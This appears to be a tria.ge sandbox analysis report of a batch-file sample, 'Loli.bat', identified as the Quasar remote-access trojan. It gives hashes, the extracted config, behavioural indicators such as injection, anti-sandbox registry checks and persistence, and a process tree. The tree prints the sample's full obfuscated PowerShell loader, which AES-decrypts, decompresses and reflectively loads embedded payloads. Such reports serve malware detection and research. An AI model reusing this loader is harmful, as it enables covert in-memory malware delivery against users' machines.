Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
55s -
max time network
52s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
02/01/2025, 23:05
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win10ltsc2021-20241211-en
General
-
Target
Loli.bat
-
Size
7.2MB
-
MD5
d266b84f245e8de76e05e762e3b7cfca
-
SHA1
ed75a3413e35ff95bb01a4027f38e2a0e22e2cae
-
SHA256
26a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad
-
SHA512
b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f
-
SSDEEP
49152:2Ispe9WTFYTG/p+hBJhMIZHEUaS9Yvg/mAi+v16h18WqW18EfCfKNHppku4O3v9y:h
Malware Config
Extracted
quasar
-
encryption_key
31387DAD824ED1DBDC13F28AAF68CFB9BAC9E25E
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3452-1776-0x00000190F98A0000-0x00000190FA00E000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2544 created 648 2544 powershell.exe 5 PID 3452 created 648 3452 powershell.exe 5 -
Blocklisted process makes network request 8 IoCs
flow pid Process 3 3452 powershell.exe 4 3452 powershell.exe 5 3452 powershell.exe 6 3452 powershell.exe 7 3452 powershell.exe 8 3452 powershell.exe 9 3452 powershell.exe 10 3452 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2544 powershell.exe 3452 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 2324 DjGPQo.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$nya-Kix2mZhJ svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2544 set thread context of 3388 2544 powershell.exe 82 PID 3452 set thread context of 5008 3452 powershell.exe 91 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\$nya-onimai2\DjGPQo.exe powershell.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3452 powershell.exe 3388 dllhost.exe 3388 dllhost.exe 3452 powershell.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3452 powershell.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3452 powershell.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3388 dllhost.exe 3452 powershell.exe 3388 dllhost.exe 3388 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 3388 dllhost.exe Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2708 svchost.exe Token: SeIncreaseQuotaPrivilege 2708 svchost.exe Token: SeSecurityPrivilege 2708 svchost.exe Token: SeTakeOwnershipPrivilege 2708 svchost.exe Token: SeLoadDriverPrivilege 2708 svchost.exe Token: SeSystemtimePrivilege 2708 svchost.exe Token: SeBackupPrivilege 2708 svchost.exe Token: SeRestorePrivilege 2708 svchost.exe Token: SeShutdownPrivilege 2708 svchost.exe Token: SeSystemEnvironmentPrivilege 2708 svchost.exe Token: SeUndockPrivilege 2708 svchost.exe Token: SeManageVolumePrivilege 2708 svchost.exe Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeDebugPrivilege 3452 powershell.exe Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeDebugPrivilege 5008 dllhost.exe Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2708 svchost.exe Token: SeIncreaseQuotaPrivilege 2708 svchost.exe Token: SeSecurityPrivilege 2708 svchost.exe Token: SeTakeOwnershipPrivilege 2708 svchost.exe Token: SeLoadDriverPrivilege 2708 svchost.exe Token: SeSystemtimePrivilege 2708 svchost.exe Token: SeBackupPrivilege 2708 svchost.exe Token: SeRestorePrivilege 2708 svchost.exe Token: SeShutdownPrivilege 2708 svchost.exe Token: SeSystemEnvironmentPrivilege 2708 svchost.exe Token: SeUndockPrivilege 2708 svchost.exe Token: SeManageVolumePrivilege 2708 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2708 svchost.exe Token: SeIncreaseQuotaPrivilege 2708 svchost.exe Token: SeSecurityPrivilege 2708 svchost.exe Token: SeTakeOwnershipPrivilege 2708 svchost.exe Token: SeLoadDriverPrivilege 2708 svchost.exe Token: SeSystemtimePrivilege 2708 svchost.exe Token: SeBackupPrivilege 2708 svchost.exe Token: SeRestorePrivilege 2708 svchost.exe Token: SeShutdownPrivilege 2708 svchost.exe Token: SeSystemEnvironmentPrivilege 2708 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3452 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1292 wrote to memory of 3684 1292 cmd.exe 78 PID 1292 wrote to memory of 3684 1292 cmd.exe 78 PID 1292 wrote to memory of 3516 1292 cmd.exe 79 PID 1292 wrote to memory of 3516 1292 cmd.exe 79 PID 1292 wrote to memory of 1972 1292 cmd.exe 80 PID 1292 wrote to memory of 1972 1292 cmd.exe 80 PID 1292 wrote to memory of 2544 1292 cmd.exe 81 PID 1292 wrote to memory of 2544 1292 cmd.exe 81 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 2544 wrote to memory of 3388 2544 powershell.exe 82 PID 3388 wrote to memory of 648 3388 dllhost.exe 5 PID 3388 wrote to memory of 704 3388 dllhost.exe 7 PID 3388 wrote to memory of 1008 3388 dllhost.exe 12 PID 3388 wrote to memory of 764 3388 dllhost.exe 13 PID 3388 wrote to memory of 776 3388 dllhost.exe 14 PID 3388 wrote to memory of 692 3388 dllhost.exe 15 PID 3388 wrote to memory of 1076 3388 dllhost.exe 16 PID 3388 wrote to memory of 1128 3388 dllhost.exe 17 PID 3388 wrote to memory of 1168 3388 dllhost.exe 19 PID 3388 wrote to memory of 1224 3388 dllhost.exe 20 PID 3388 wrote to memory of 1248 3388 dllhost.exe 21 PID 3388 wrote to memory of 1324 3388 dllhost.exe 22 PID 3388 wrote to memory of 1456 3388 dllhost.exe 23 PID 3388 wrote to memory of 1468 3388 dllhost.exe 24 PID 3388 wrote to memory of 1520 3388 dllhost.exe 25 PID 3388 wrote to memory of 1600 3388 dllhost.exe 26 PID 3388 wrote to memory of 1612 3388 dllhost.exe 27 PID 3388 wrote to memory of 1700 3388 dllhost.exe 28 PID 3388 wrote to memory of 1732 3388 dllhost.exe 29 PID 3388 wrote to memory of 1792 3388 dllhost.exe 30 PID 3388 wrote to memory of 1852 3388 dllhost.exe 31 PID 3388 wrote to memory of 1040 3388 dllhost.exe 32 PID 3388 wrote to memory of 2000 3388 dllhost.exe 33 PID 3388 wrote to memory of 2056 3388 dllhost.exe 34 PID 3388 wrote to memory of 2064 3388 dllhost.exe 35 PID 3388 wrote to memory of 2100 3388 dllhost.exe 36 PID 3388 wrote to memory of 2152 3388 dllhost.exe 37 PID 3388 wrote to memory of 2292 3388 dllhost.exe 39 PID 3388 wrote to memory of 2316 3388 dllhost.exe 40 PID 3388 wrote to memory of 2500 3388 dllhost.exe 41 PID 3388 wrote to memory of 2508 3388 dllhost.exe 42 PID 3388 wrote to memory of 2584 3388 dllhost.exe 43 PID 3388 wrote to memory of 2664 3388 dllhost.exe 44 PID 3388 wrote to memory of 2676 3388 dllhost.exe 45 PID 3388 wrote to memory of 2696 3388 dllhost.exe 46 PID 3388 wrote to memory of 2708 3388 dllhost.exe 47 PID 3388 wrote to memory of 2740 3388 dllhost.exe 48 PID 3388 wrote to memory of 2764 3388 dllhost.exe 49 PID 3388 wrote to memory of 2820 3388 dllhost.exe 50 PID 3388 wrote to memory of 3080 3388 dllhost.exe 51 PID 3388 wrote to memory of 3296 3388 dllhost.exe 52 PID 3388 wrote to memory of 3428 3388 dllhost.exe 53 PID 3388 wrote to memory of 3472 3388 dllhost.exe 54 PID 3388 wrote to memory of 3848 3388 dllhost.exe 57 PID 3388 wrote to memory of 3928 3388 dllhost.exe 58 PID 3388 wrote to memory of 4012 3388 dllhost.exe 59 PID 3388 wrote to memory of 4076 3388 dllhost.exe 60 PID 3388 wrote to memory of 4356 3388 dllhost.exe 61 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:648
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:764
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{eabc6fb1-153b-4fed-a5c2-81e3942b67f0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5cc4ba0c-4efc-464e-837b-95c8ca70e20e}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2764
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2100
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
PID:2584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2664
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2820
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3080
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1620
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:3684
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"3⤵PID:3516
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));3⤵PID:1972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
